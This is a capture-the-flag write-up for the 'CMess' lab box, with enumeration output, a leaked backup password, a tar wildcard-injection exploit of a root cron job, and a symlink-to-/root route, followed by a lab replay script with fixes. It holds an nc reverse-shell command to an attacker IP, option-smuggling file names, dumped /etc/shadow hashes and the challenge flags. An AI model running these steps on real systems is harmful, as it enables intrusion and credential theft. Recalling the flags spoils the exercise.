/var/www/html/src/Cocur/Slugify/RuleProvider/RuleProviderInterface.php
/var/www/html/src/Cocur/Slugify/Slugify.php
/var/www/html/src/Cocur/Slugify/SlugifyInterface.php
/var/www/html/src/Cocur/Slugify/bin
/var/www/html/src/Cocur/Slugify/bin/generate-default.php
/var/www/html/src/blog
/var/www/html/src/blog/controllers
/var/www/html/src/blog/controllers/blog.php
/var/www/html/src/blog/load.php
/var/www/html/src/blog/package.json
/var/www/html/src/blog/views
/var/www/html/src/blog/views/blog-homepage.php
/var/www/html/src/core
/var/www/html/src/core/assets
/var/www/html/src/core/assets/admin
/var/www/html/src/core/assets/admin/content.css
/var/www/html/src/core/assets/admin/content.js
/var/www/html/src/core/assets/admin/listcomponent.js
/var/www/html/src/core/assets/admin/media.js
/var/www/html/src/core/assets/admin/style.css
/var/www/html/src/core/assets/cdn_paths.php
/var/www/html/src/core/assets/lazyImgLoad.js
/var/www/html/src/core/bootstrap.php
/var/www/html/src/core/classes
/var/www/html/src/core/classes/cache.php
/var/www/html/src/core/classes/controller.php
/var/www/html/src/core/classes/db.php
/var/www/html/src/core/classes/db_backup.php
/var/www/html/src/core/classes/event.php
#)You_can_write_even_more_files_inside_last_directory

/var/www/html/src/core/controllers
/var/www/html/src/core/controllers/admin.php
/var/www/html/src/core/controllers/api.php
/var/www/html/src/core/controllers/cm.php
/var/www/html/src/core/controllers/fm.php
/var/www/html/src/core/controllers/login.php
#)You_can_write_even_more_files_inside_last_directory

/var/www/html/src/core/install
/var/www/html/src/core/install/index.php
/var/www/html/src/core/install/install.form.php
/var/www/html/src/core/install/install.php
/var/www/html/src/core/install/install.sql.php
/var/www/html/src/core/install/installed.php
#)You_can_write_even_more_files_inside_last_directory

/var/www/html/src/core/lang
/var/www/html/src/core/lang/admin
/var/www/html/src/core/lang/admin/el.json
/var/www/html/src/core/lang/admin/en.json
/var/www/html/src/core/lang/admin/es.json
/var/www/html/src/core/lang/admin/et.json
/var/www/html/src/core/lang/admin/fr.json
/var/www/html/src/core/lang/content
/var/www/html/src/core/lang/content/el.js
/var/www/html/src/core/lang/content/en.js
/var/www/html/src/core/lang/content/es.js
/var/www/html/src/core/lang/content/fr.js
/var/www/html/src/core/lang/de.json
/var/www/html/src/core/lang/el.json
/var/www/html/src/core/lang/en.json
/var/www/html/src/core/lang/es.json
/var/www/html/src/core/lang/et.json
#)You_can_write_even_more_files_inside_last_directory

/var/www/html/src/core/lang/login/de.json
/var/www/html/src/core/lang/login/el.json
/var/www/html/src/core/lang/login/en.json
/var/www/html/src/core/lang/login/es.json
/var/www/html/src/core/lang/login/et.json
#)You_can_write_even_more_files_inside_last_directory

/var/www/html/src/core/lang/myprofile
/var/www/html/src/core/lang/myprofile/en.json
/var/www/html/src/core/lang/myprofile/es.json
/var/www/html/src/core/lang/myprofile/fr.json
/var/www/html/src/core/lang/permissions
/var/www/html/src/core/lang/permissions/el.json
/var/www/html/src/core/lang/permissions/en.json
/var/www/html/src/core/lang/permissions/es.json
/var/www/html/src/core/lang/permissions/et.json
/var/www/html/src/core/lang/permissions/fr.json
/var/www/html/src/core/lib
/var/www/html/src/core/lib/gila.min.css
/var/www/html/src/core/lib/gila.min.js
/var/www/html/src/core/lib/vue-draggable.min.js
/var/www/html/src/core/load.php
/var/www/html/src/core/models
/var/www/html/src/core/models/menu.php
/var/www/html/src/core/models/page.php
/var/www/html/src/core/models/post.php
/var/www/html/src/core/models/profile.php
/var/www/html/src/core/models/user.php
#)You_can_write_even_more_files_inside_last_directory

/var/www/html/src/core/package.json
/var/www/html/src/core/tables
/var/www/html/src/core/tables/page.php
/var/www/html/src/core/tables/post.php
/var/www/html/src/core/tables/postcategory.php
/var/www/html/src/core/tables/user-post.php
/var/www/html/src/core/tables/user.php
#)You_can_write_even_more_files_inside_last_directory

/var/www/html/src/core/update.php
/var/www/html/src/core/views
/var/www/html/src/core/views/404.php
/var/www/html/src/core/views/admin
/var/www/html/src/core/views/admin/content-vue.php
/var/www/html/src/core/views/admin/contenttype.php
/var/www/html/src/core/views/admin/dashboard.php
/var/www/html/src/core/views/admin/db_backup.php
/var/www/html/src/core/views/admin/edit_widget.php
#)You_can_write_even_more_files_inside_last_directory

/var/www/html/src/core/views/blog-author.php
/var/www/html/src/core/views/blog-category.php
/var/www/html/src/core/views/blog-feed.php
/var/www/html/src/core/views/blog-list.php
/var/www/html/src/core/views/blog-search.php
#)You_can_write_even_more_files_inside_last_directory

/var/www/html/src/core/views/tpl/menu.bootstrap.php
/var/www/html/src/core/views/tpl/menu.php
/var/www/html/src/core/widgets
/var/www/html/src/core/widgets/.htaccess
/var/www/html/src/core/widgets/_widget_example
/var/www/html/src/core/widgets/_widget_example/_widget_example.php
/var/www/html/src/core/widgets/_widget_example/widget.php
/var/www/html/src/core/widgets/category-post
/var/www/html/src/core/widgets/category-post/category-post.php
/var/www/html/src/core/widgets/category-post/style.css
/var/www/html/src/core/widgets/category-post/widget.php
/var/www/html/src/core/widgets/contact-form
/var/www/html/src/core/widgets/contact-form/contact-form.php
/var/www/html/src/core/widgets/contact-form/widget.php
/var/www/html/src/core/widgets/features
/var/www/html/src/core/widgets/features/features.php
/var/www/html/src/core/widgets/features/widget.php
/var/www/html/src/core/widgets/gallery
/var/www/html/src/core/widgets/gallery/gallery.php
/var/www/html/src/core/widgets/gallery/widget.php
/var/www/html/src/core/widgets/image
/var/www/html/src/core/widgets/image/image.php
/var/www/html/src/core/widgets/image/widget.php
/var/www/html/src/core/widgets/latest-post
/var/www/html/src/core/widgets/latest-post/latest-post.php
/var/www/html/src/core/widgets/latest-post/widget.php
/var/www/html/src/core/widgets/links
/var/www/html/src/core/widgets/links/links.php
/var/www/html/src/core/widgets/links/widget.php
/var/www/html/src/core/widgets/paragraph
/var/www/html/src/core/widgets/paragraph/paragraph.php
/var/www/html/src/core/widgets/paragraph/widget.php
/var/www/html/src/core/widgets/post-categories
/var/www/html/src/core/widgets/post-categories/post-categories.php
/var/www/html/src/core/widgets/post-categories/widget.php
/var/www/html/src/core/widgets/social-icons
/var/www/html/src/core/widgets/social-icons/social-icons.php
/var/www/html/src/core/widgets/social-icons/widget.php
/var/www/html/src/core/widgets/tag
/var/www/html/src/core/widgets/tag/tag.php
/var/www/html/src/core/widgets/tag/widget.php
/var/www/html/src/core/widgets/text
/var/www/html/src/core/widgets/text/text.php
/var/www/html/src/core/widgets/text/widget.php
/var/www/html/src/featured_grid
/var/www/html/src/featured_grid/assets
/var/www/html/src/featured_grid/assets/style.css
/var/www/html/src/featured_grid/load.php
/var/www/html/src/featured_grid/package.json
/var/www/html/src/ganalytics
/var/www/html/src/ganalytics/load.php
/var/www/html/src/ganalytics/package.json
/var/www/html/src/gila_fb_comments
/var/www/html/src/gila_fb_comments/load.php
/var/www/html/src/gila_fb_comments/package.json
/var/www/html/src/reCAPTCHA
/var/www/html/src/reCAPTCHA/load.php
/var/www/html/src/reCAPTCHA/package.json
/var/www/html/themes
/var/www/html/themes/.htaccess
/var/www/html/themes/gila-blog
/var/www/html/themes/gila-blog/LICENSE
/var/www/html/themes/gila-blog/blocks-display-head.php
/var/www/html/themes/gila-blog/blog-category.php
/var/www/html/themes/gila-blog/blog-list.php
/var/www/html/themes/gila-blog/blog-tag.php
#)You_can_write_even_more_files_inside_last_directory

/var/www/html/themes/gila-mag
/var/www/html/themes/gila-mag/LICENSE
/var/www/html/themes/gila-mag/blocks-display-head.php
/var/www/html/themes/gila-mag/blog-list.php
/var/www/html/themes/gila-mag/blog-tag.php
/var/www/html/themes/gila-mag/footer.php
#)You_can_write_even_more_files_inside_last_directory

/var/www/html/tmp
/var/www/html/tmp/.htaccess

╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
  Group www-data:
/tmp/linpeas.sh

╔══════════╣ Searching passwords in config PHP files

╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/bin/systemd-ask-password
/bin/systemd-tty-ask-password-agent
/etc/pam.d/common-password
/opt/.password.bak
/usr/lib/grub/i386-pc/legacy_password_test.mod
/usr/lib/grub/i386-pc/password.mod
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/lib/mysql/plugin/validate_password.so
/usr/share/help-langpack/en_AU/ubuntu-help/user-changepassword.page
/usr/share/help-langpack/en_AU/ubuntu-help/user-forgottenpassword.page
/usr/share/help-langpack/en_AU/ubuntu-help/user-goodpassword.page
/usr/share/help-langpack/en_CA/ubuntu-help/user-changepassword.page
/usr/share/help-langpack/en_CA/ubuntu-help/user-forgottenpassword.page
/usr/share/help-langpack/en_CA/ubuntu-help/user-goodpassword.page
/usr/share/help-langpack/en_GB/evince/password.page
/usr/share/help-langpack/en_GB/ubuntu-help/user-changepassword.page
/usr/share/help-langpack/en_GB/ubuntu-help/user-forgottenpassword.page
/usr/share/help-langpack/en_GB/ubuntu-help/user-goodpassword.page
/usr/share/help-langpack/en_GB/zenity/password.page
/usr/share/icons/Adwaita/scalable/status/dialog-password-symbolic.svg
/usr/share/icons/Humanity/apps/24/password.png
/usr/share/icons/Humanity/apps/48/password.svg
/usr/share/icons/Humanity/status/16/dialog-password.png
/usr/share/icons/Humanity/status/24/dialog-password.png
/usr/share/icons/Humanity/status/48/dialog-password.svg
/usr/share/locale-langpack/en_AU/LC_MESSAGES/credentials-control-center.mo
/usr/share/locale-langpack/en_AU/LC_MESSAGES/ubuntuone-credentials.mo
/usr/share/locale-langpack/en_CA/LC_MESSAGES/credentials-control-center.mo
/usr/share/locale-langpack/en_GB/LC_MESSAGES/credentials-control-center.mo
/usr/share/locale-langpack/en_GB/LC_MESSAGES/ubuntuone-credentials.mo
/usr/share/man/man1/systemd-ask-password.1.gz
/usr/share/man/man1/systemd-tty-ask-password-agent.1.gz
/usr/share/man/man7/credentials.7.gz
/usr/share/man/man8/systemd-ask-password-console.path.8.gz
/usr/share/man/man8/systemd-ask-password-console.service.8.gz
/usr/share/man/man8/systemd-ask-password-wall.path.8.gz
/usr/share/man/man8/systemd-ask-password-wall.service.8.gz
  #)There are more creds/passwds files in the previous parent folder

/usr/share/pam/common-password.md5sums
/var/cache/debconf/passwords.dat
/var/lib/pam/password
/var/www/html/src/core/views/login-change-password.php

╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs

╔══════════╣ Searching passwords inside logs (limit 70)
 base-passwd depends on libc6 (>= 2.8); however:
 base-passwd depends on libdebconfclient0 (>= 0.145); however:
2019-02-26 23:58:11 configure base-passwd:amd64 3.5.39 3.5.39
2019-02-26 23:58:11 install base-passwd:amd64 <none> 3.5.39
2019-02-26 23:58:11 status half-configured base-passwd:amd64 3.5.39
2019-02-26 23:58:11 status half-installed base-passwd:amd64 3.5.39
2019-02-26 23:58:11 status installed base-passwd:amd64 3.5.39
2019-02-26 23:58:11 status unpacked base-passwd:amd64 3.5.39
2019-02-26 23:58:13 status half-configured base-passwd:amd64 3.5.39
2019-02-26 23:58:13 status half-installed base-passwd:amd64 3.5.39
2019-02-26 23:58:13 status unpacked base-passwd:amd64 3.5.39
2019-02-26 23:58:13 upgrade base-passwd:amd64 3.5.39 3.5.39
2019-02-26 23:58:19 install passwd:amd64 <none> 1:4.2-3.1ubuntu5
2019-02-26 23:58:19 status half-installed passwd:amd64 1:4.2-3.1ubuntu5
2019-02-26 23:58:19 status unpacked passwd:amd64 1:4.2-3.1ubuntu5
2019-02-26 23:58:22 configure base-passwd:amd64 3.5.39 <none>
2019-02-26 23:58:22 status half-configured base-passwd:amd64 3.5.39
2019-02-26 23:58:22 status installed base-passwd:amd64 3.5.39
2019-02-26 23:58:22 status unpacked base-passwd:amd64 3.5.39
2019-02-26 23:58:28 configure passwd:amd64 1:4.2-3.1ubuntu5 <none>
2019-02-26 23:58:28 status half-configured passwd:amd64 1:4.2-3.1ubuntu5
2019-02-26 23:58:28 status installed passwd:amd64 1:4.2-3.1ubuntu5
2019-02-26 23:58:28 status unpacked passwd:amd64 1:4.2-3.1ubuntu5
2019-02-26 23:59:08 status half-configured passwd:amd64 1:4.2-3.1ubuntu5
2019-02-26 23:59:08 status half-installed passwd:amd64 1:4.2-3.1ubuntu5
2019-02-26 23:59:08 status unpacked passwd:amd64 1:4.2-3.1ubuntu5
2019-02-26 23:59:08 status unpacked passwd:amd64 1:4.2-3.1ubuntu5.3
2019-02-26 23:59:08 upgrade passwd:amd64 1:4.2-3.1ubuntu5 1:4.2-3.1ubuntu5.3
2019-02-26 23:59:09 configure passwd:amd64 1:4.2-3.1ubuntu5.3 <none>
2019-02-26 23:59:09 status half-configured passwd:amd64 1:4.2-3.1ubuntu5.3
2019-02-26 23:59:09 status installed passwd:amd64 1:4.2-3.1ubuntu5.3
2019-02-26 23:59:09 status unpacked passwd:amd64 1:4.2-3.1ubuntu5.3
Description: Set up users and passwords
Preparing to unpack .../base-passwd_3.5.39_amd64.deb ...
Preparing to unpack .../passwd_1%3a4.2-3.1ubuntu5_amd64.deb ...
Selecting previously unselected package base-passwd.
Selecting previously unselected package passwd.
Setting up base-passwd (3.5.39) ...
Setting up passwd (1:4.2-3.1ubuntu5) ...
Shadow passwords are now on.
Unpacking base-passwd (3.5.39) ...
Unpacking base-passwd (3.5.39) over (3.5.39) ...
Unpacking passwd (1:4.2-3.1ubuntu5) ...
dpkg: base-passwd: dependency problems, but configuring anyway as you requested:
                                ╔════════════════╗
════════════════════════════════╣ API Keys Regex ╠════════════════════════════════
                                ╚════════════════╝
Regexes to search for API keys aren't activated, use param '-r' 


╔══════════╣ Executable files potentially added by user (limit 70)
2020-02-06+18:54:07.1196134090 /opt/.password.bak

www-data@cmess:/tmp$ tar -xzf andre_backup.tar.gz

www-data@cmess:/tmp$ cat note
cat note
Note to self.
Anything in here will be backed up! 

www-data@cmess:/opt$ ls -lah
ls -lah
total 12K
drwxr-xr-x  2 root root 4.0K Feb  6  2020 .
drwxr-xr-x 22 root root 4.0K Feb  6  2020 ..
-rwxrwxrwx  1 root root   36 Feb  6  2020 .password.bak
www-data@cmess:/opt$ cat .password.bak
cat .password.bak
andres backup password
UQfsdCB7aAP6

www-data@cmess:/home$ su andre
su andre
Password: UQfsdCB7aAP6

andre@cmess:/home$ cd andre
cd andre
andre@cmess:~$ ls
ls
backup  user.txt
andre@cmess:~$ cat user.txt
cat user.txt
thm{c529b5d5d6ab6b430b7eb1903b2b5e1b}

andre@cmess:~$ cd backup
cd backup
andre@cmess:~/backup$ ls
ls
note
andre@cmess:~/backup$ cat note
cat note
Note to self.
Anything in here will be backed up! 
andre@cmess:~/backup$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/2 *   * * *   root    cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *

https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/

andre@cmess:~/backup$ sudo -l
sudo -l
[sudo] password for andre: UQfsdCB7aAP6

Sorry, user andre may not run sudo on cmess.

andre@cmess:~/backup$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.8.19.103 1338 >/tmp/f" > shell.sh
             
andre@cmess:~/backup$ echo ""> "--checkpoint-action=exec=sh shell.sh"

andre@cmess:~/backup$ echo ""> --checkpoint=1

andre@cmess:~/backup$ ls -l
ls -l
total 16
-rw-rw-r-- 1 andre andre  1 Mar 14 10:56 --checkpoint=1
-rw-rw-r-- 1 andre andre  1 Mar 14 10:56 --checkpoint-action=exec=sh shell.sh
-rwxr-x--- 1 andre andre 51 Feb  9  2020 note
-rw-rw-r-- 1 andre andre 74 Mar 14 10:56 shell.sh

┌──(witty㉿kali)-[~/Downloads]
└─$ rlwrap nc -lvnp 1338 
listening on [any] 1338 ...
connect to [10.8.19.103] from (UNKNOWN) [10.10.105.35] 59904
sh: 0: can't access tty; job control turned off
# cd /root
# ls
root.txt
# cat root.txt
thm{9f85b7fdeb2cf96985bf5761a93546a2}
# cat /etc/shadow
root:$6$W.gDTDR8$XXB79ORIcggP9.Cl2HzbUfmdADUCasSD92e4HS2kjw5Y9AsTvFeKKbGfDFycsdXoYOhB7Da9mFPcca5a3DyKG1:18299:0:99999:7:::
daemon:*:17953:0:99999:7:::
bin:*:17953:0:99999:7:::
sys:*:17953:0:99999:7:::
sync:*:17953:0:99999:7:::
games:*:17953:0:99999:7:::
man:*:17953:0:99999:7:::
lp:*:17953:0:99999:7:::
mail:*:17953:0:99999:7:::
news:*:17953:0:99999:7:::
uucp:*:17953:0:99999:7:::
proxy:*:17953:0:99999:7:::
www-data:*:17953:0:99999:7:::
backup:*:17953:0:99999:7:::
list:*:17953:0:99999:7:::
irc:*:17953:0:99999:7:::
gnats:*:17953:0:99999:7:::
nobody:*:17953:0:99999:7:::
systemd-timesync:*:17953:0:99999:7:::
systemd-network:*:17953:0:99999:7:::
systemd-resolve:*:17953:0:99999:7:::
systemd-bus-proxy:*:17953:0:99999:7:::
syslog:*:17953:0:99999:7:::
_apt:*:17953:0:99999:7:::
messagebus:*:18299:0:99999:7:::
uuidd:*:18299:0:99999:7:::
andre:$6$GeMRsVKt$KEQmO.oV7yzpLOVXjDXG/8M/rbw1bngT/VOoRQSn2saquzhMTMl5J8rstkFQ1QD3/dLFS1yAMqj1kbiQWYvQ8.:18299:0:99999:7:::
mysql:!:18299:0:99999:7:::
sshd:*:18299:0:99999:7:::


using symbolic links

Symbolic links, also known as soft links, are special files that hold the path of another file or directory. Unlike hard links they can cross filesystems and can point at a target that does not exist yet (a dangling link). They are commonly used as shortcuts or aliases for files and directories, and for redirecting a fixed path to a resource that actually lives somewhere else.

For example, to create a symbolic link named "mylink" in the current directory that points to a file named "myfile" in the same directory:


ln -s myfile mylink

This creates "mylink" pointing at "myfile"; opening "mylink" opens "myfile". That redirection is what gives a second route to root on this box: the cron job runs as root, changes into /home/andre/backup and archives whatever `*` expands to there. andre owns his home directory, so he can move the real backup directory aside and replace it with a symlink to /root. root's `cd` follows the link, and on the next run the contents of /root are written to /tmp/andre_backup.tar.gz, which andre can read and extract.

andre@cmess:~/backup$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/2 *   * * *   root    cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *

andre@cmess:~$ mv backup backup_bak
mv backup backup_bak
andre@cmess:~$ ls
ls
backup_bak  user.txt

andre@cmess:~$ ln -s /root/ backup
ln -s /root/ backup
andre@cmess:~$ ls -lah
ls -lah
total 36K
drwxr-x--- 4 andre andre 4.0K Mar 14 11:07 .
drwxr-xr-x 3 root  root  4.0K Feb  6  2020 ..
lrwxrwxrwx 1 andre andre    6 Mar 14 11:07 backup -> /root/
drwxr-x--- 2 andre andre 4.0K Mar 14 10:56 backup_bak
lrwxrwxrwx 1 root  root     9 Feb  6  2020 .bash_history -> /dev/null
-rwxr-x--- 1 andre andre  220 Feb  6  2020 .bash_logout
-rwxr-x--- 1 andre andre 3.7K Feb  6  2020 .bashrc
drwxr-x--- 2 andre andre 4.0K Feb  6  2020 .cache
-rwxr-x--- 1 andre andre  655 Feb  6  2020 .profile
lrwxrwxrwx 1 root  root     9 Feb  6  2020 .sudo_as_admin_successful -> /dev/null
-rwxr-x--- 1 andre andre   38 Feb  6  2020 user.txt
-rwxr-x--- 1 andre andre  635 Feb  9  2020 .viminfo

andre@cmess:~$ cd /tmp
cd /tmp
andre@cmess:/tmp$ tar -xvf andre_backup.tar.gz
tar -xvf andre_backup.tar.gz
root.txt
andre@cmess:/tmp$ cat root.txt
cat root.txt
thm{9f85b7fdeb2cf96985bf5761a93546a2}
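Both privilege-escalation routes above (the --checkpoint-action wildcard injection and swapping the backup directory for a symlink to /root) come down to the same root cause: a root cron job running tar over an unquoted glob in a directory that andre owns. The script below is an added example, not part of the original writeup or of the box, that reproduces each route against throw-away directories as the current user: a fake root home standing in for /root, a fake backup directory standing in for /home/andre/backup, and a marker file in place of the reverse shell. All paths, file names and contents under $LAB are constructed for the demo. It assumes GNU tar (the --checkpoint options are GNU extensions) and gzip.

```shell
#!/bin/sh
# Added example: replays the two abuses of
#   */2 * * * * root cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *
# against scratch directories as the current user. GNU tar and gzip assumed.

set -e

# Scratch layout (constructed for the demo, not the box's real paths):
#   $LAB/root/root.txt   stands in for /root/root.txt
#   $LAB/backup/         stands in for /home/andre/backup
#   $LAB/pwned           marker written by the planted payload (replaces the reverse shell)
LAB=$(mktemp -d)
mkdir -p "$LAB/root" "$LAB/backup"
printf 'fake-root-flag\n' > "$LAB/root/root.txt"
printf 'Note to self.\nAnything in here will be backed up!\n' > "$LAB/backup/note"

# The cron line, verbatim apart from the paths. The unquoted `*` is the bug:
# the shell expands it to every name in the directory and hands each one to
# tar as a separate argument, so names that look like options are parsed as options.
run_backup_job() {
    ( cd "$LAB/backup" && tar -zcf "$LAB/andre_backup.tar.gz" * ) >/dev/null 2>&1 || true
}

# Route 1: plant files named like tar options. Every checkpoint fires the exec
# action, which runs `sh shell.sh` with the privileges of whoever runs tar.
plant_checkpoint_payload() {
    printf 'touch "%s/pwned"\n' "$LAB" > "$LAB/backup/shell.sh"
    : > "$LAB/backup/--checkpoint=1"
    : > "$LAB/backup/--checkpoint-action=exec=sh shell.sh"
}

# Prints "ran" if the payload executed during the backup, "did not run" otherwise.
checkpoint_result() {
    rm -f "$LAB/pwned"
    run_backup_job
    [ -e "$LAB/pwned" ] && echo ran || echo "did not run"
}

# Hardened form of the same job: `--` ends option parsing, so option-shaped
# names are archived as ordinary files. Same output convention as above.
hardened_result() {
    rm -f "$LAB/pwned"
    ( cd "$LAB/backup" && tar -zcf "$LAB/andre_backup.tar.gz" -- * ) >/dev/null 2>&1 || true
    [ -e "$LAB/pwned" ] && echo ran || echo "did not run"
}

# Route 2: no option injection at all. The user owns the parent directory, so
# the backup directory can be replaced by a symlink; `cd` follows it and `*`
# now expands to the link target's files. `--` does nothing against this one.
swap_backup_for_symlink() {
    rm -rf "$LAB/backup"
    ln -s "$LAB/root" "$LAB/backup"
}

# Runs the (unhardened) job and lists what ended up in the archive, one name per line.
archived_names() {
    run_backup_job
    tar -tzf "$LAB/andre_backup.tar.gz"
}

cleanup() { rm -rf "$LAB"; }
```

Run it with sh and call the functions in order: plant_checkpoint_payload then checkpoint_result prints "ran", hardened_result prints "did not run" with the same planted files, and after swap_backup_for_symlink the archive listed by archived_names contains root.txt. The `--` fix only closes the option-injection route; as long as root archives a directory that a lower-privileged user owns, the symlink route stays open, and the real fix is to run the backup as that user or from a root-owned path.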

Compromise this machine and obtain user.txt

Have you tried fuzzing for subdomains?

thm{c529b5d5d6ab6b430b7eb1903b2b5e1b}

Escalate your privileges and obtain root.txt

thm{9f85b7fdeb2cf96985bf5761a93546a2}
